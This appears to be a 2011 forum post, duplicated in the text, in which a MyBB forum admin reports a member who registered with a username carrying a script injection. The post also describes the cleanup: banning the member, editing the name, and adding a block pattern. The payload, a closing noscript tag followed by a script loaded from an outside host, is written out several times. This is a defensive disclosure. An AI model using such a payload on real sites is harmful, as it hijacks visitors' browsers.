2011-11-29, 01:10 PM
http://www.dashingforums.com
So about an hour ago I had a member successfully register with the following username:
The Javascript was accepted and the username was accepted. This lead to any page mentioning his username (such as the index because they were the newest member, their profile page, and the user page in the Admin CP) redirecting to the site sourced in the script.
Screenshot:
For other people experiencing the same, this is how I resolved the issue:
1) Banned member:
3) With NoScripts enabled, I was able to edit the username so that the script was no longer present (so the member is now 'Andre Dejavu').
4) Added the following to disallowed usernames (haven't tested yet):
The guy is bragging about other hacks on his Facebook page, but I'm not sure how many of those are using the MyBB software:
https://www.facebook.com/specialone.andre
Anyway, I hope my information was clear and that you can find a solution to prevent this in the future. It wasn't the worst of attacks, but the fact that it was so simple to pull off astounds me.
Hope to hear from you guys soon,
- Fanta
So about an hour ago I had a member successfully register with the following username:
Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
The Javascript was accepted and the username was accepted. This lead to any page mentioning his username (such as the index because they were the newest member, their profile page, and the user page in the Admin CP) redirecting to the site sourced in the script.
Screenshot:
For other people experiencing the same, this is how I resolved the issue:
1) Banned member:
Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
2) Downloaded NoScripts (Chrome Extension). I suspect NoScript for Firefox would work as well but I have not confirmed this.3) With NoScripts enabled, I was able to edit the username so that the script was no longer present (so the member is now 'Andre Dejavu').
4) Added the following to disallowed usernames (haven't tested yet):
*</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
The guy is bragging about other hacks on his Facebook page, but I'm not sure how many of those are using the MyBB software:
https://www.facebook.com/specialone.andre
Anyway, I hope my information was clear and that you can find a solution to prevent this in the future. It wasn't the worst of attacks, but the fact that it was so simple to pull off astounds me.
Hope to hear from you guys soon,
- Fanta